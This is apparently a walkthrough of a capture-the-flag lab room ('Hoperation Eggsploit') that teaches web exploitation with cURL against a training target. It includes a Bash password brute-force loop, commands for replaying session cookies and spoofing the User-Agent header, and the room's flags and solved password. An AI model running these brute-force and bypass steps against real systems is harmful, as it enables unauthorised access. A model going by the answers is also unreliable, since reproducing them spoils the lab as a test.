Advent of Cyber 2025 – Day 24: Exploitation with cURL (Hoperation Eggsploit)

Advent of Cyber 2025 – Day 24: Exploitation with cURL (Hoperation Eggsploit)

Day 24 of Advent of Cyber 2025 deliberately strips away comfort.

No browser tabs. No Burp Suite. No graphical tools to lean on.

Instead, you are dropped into a bare command-line environment and asked to interact with a hostile web application operated by King Malhare’s not-so-friendly minions. The mission is simple in theory but unforgiving in execution: take control of a web-based control panel and shut down the wormhole supplying enemy reinforcements.

The catch? You must speak pure HTTP, and your only weapon is cURL.

This challenge, aptly named “Hoperation Eggsploit,” is a masterclass in understanding how modern web exploitation tools actually work beneath the surface. Every step forces you to manually recreate what browsers, proxies, and automated attack frameworks usually abstract away.

Why This Room Matters

Most beginners learn web exploitation through polished interfaces. You click buttons, intercept traffic, send payloads, and get results. Useful, yes — but dangerous if you never understand what’s happening underneath.

This room flips the script.

You are required to:

• Manually construct GET and POST requests
• Handle cookies and sessions without browser automation
• Write basic Bash scripts to brute-force authentication
• Manipulate HTTP headers, including User-Agent spoofing
• Observe raw server responses and make decisions based on behavior

By the end, it becomes painfully clear: tools don’t hack systems — understanding protocols does.

Speaking HTTP Directly with cURL

Under normal circumstances, a browser quietly handles HTTP for you. You enter a URL, click submit, and the browser negotiates headers, cookies, and sessions behind the scenes.

With no browser available, cURL becomes your voice.

The first step is a basic connectivity check:

curl http://MACHINE_IP/

This command sends a simple GET / request and returns the raw server response directly in your terminal. No styling. No rendering. Just pure HTML.

That raw output is exactly what you want. It exposes endpoints, form actions, parameters, and error messages — all essential clues for exploitation.

Task 1: Authenticating with POST Requests

The first challenge introduces a classic login form that submits credentials to a backend endpoint. In a browser, this process is invisible. With cURL, you must replicate it manually.

A typical login request looks like this:

POST /post.php
Content-Type: application/x-www-form-urlencoded
 
username=admin&password=admin

Using cURL, the same request becomes:

curl -X POST -d "username=admin&password=admin" http://MACHINE_IP/post.php

Here’s what’s happening:

• -X POST explicitly sets the HTTP method
• -d sends URL-encoded form data in the request body

When the correct credentials are submitted, the server responds with the first flag:

THM{curl_post_success}

This step reinforces a critical concept: a login form is just an HTTP endpoint with parameters. Once you understand that, the difference between a browser, Burp, or a script becomes purely cosmetic.

Task 2: Session Handling and Cookies

Authentication rarely ends with a successful login response. Most applications issue a session cookie that must be presented on subsequent requests.

Browsers do this automatically. cURL does not.

You must explicitly:

1. Capture cookies from the server
2. Replay them in future requests

First, authenticate and store the session cookie:

curl -c cookies.txt -d "username=admin&password=admin" http://MACHINE_IP/cookie.php

• -c cookies.txt saves any Set-Cookie headers to a file

Then, reuse that session:

curl -b cookies.txt http://MACHINE_IP/cookie.php

• -b cookies.txt sends the stored cookies back to the server

A valid session replay is rewarded with:

THM{session_cookie_master}

This mirrors real-world session hijacking and replay attacks. If you can capture a valid session token, you can impersonate a user — regardless of how “secure” the login page looks.

Task 3: Brute Forcing Authentication with Bash

Next, the challenge presents a weak login endpoint at /bruteforce.php. Instead of handing you automated tooling, the room forces you to build the logic yourself.

Start by creating a small password list:

admin123
password
letmein
secretpass
secret

Now write a minimal Bash loop that iterates through each password:

for pass in $(cat passwords.txt); do
  echo "Trying password: $pass"
  response=$(curl -s -X POST -d "username=admin&password=$pass" http://MACHINE_IP/bruteforce.php)
 
  if echo "$response" | grep -q "Welcome"; then
    echo "[+] Password found: $pass"
    break
  fi
done

Key concepts in play:

• -s runs cURL in silent mode
• Responses are captured into a variable
• grep identifies success based on response content

Eventually, one request behaves differently:

[+] Password found: secretpass

This is brute force in its purest form — no frameworks, no automation magic. Just repeated HTTP requests and response analysis. Every large-scale attack tool operates on this same principle.

Task 4: Bypassing User-Agent Restrictions

Some applications attempt to block scripted traffic by inspecting the User-Agent header. If the request looks automated, access is denied.

The endpoint /agent.php implements exactly this kind of weak control.

A default request fails:

curl http://MACHINE_IP/agent.php

But spoofing the User-Agent changes everything:

curl -A "TBFC" http://MACHINE_IP/agent.php

• -A overrides the User-Agent header

With the expected value supplied, the server returns:

THM{user_agent_filter_bypassed}

This highlights an uncomfortable truth: HTTP headers are just text. Any client can forge them, making User-Agent filtering a cosmetic defense at best.

Bonus Mission: Chaining Everything Together

The optional bonus challenge raises the bar.

You are instructed to:

• Use rockyou.txt for password brute forcing
• Guess a PIN within a defined range
• Combine POST requests, session cookies, headers, and scripting
• Fully authenticate and shut down the wormhole

At this stage, the room stops holding your hand.

You are expected to:

• Enumerate endpoints independently
• Maintain state across multiple requests
• Automate decision-making based on server responses

This is where the exercise transforms from a tutorial into a mini red-team engagement.

Final Thoughts

“Hoperation Eggsploit” is not about flags.

It’s about perspective.

By removing GUIs and forcing you to interact with raw HTTP, this room teaches a lesson every serious web security practitioner must learn: tools are conveniences, not crutches.

If you can exploit an application using nothing but cURL and Bash, every other tool becomes optional — and your understanding becomes transferable to any environment.

That’s a powerful skill to carry forward.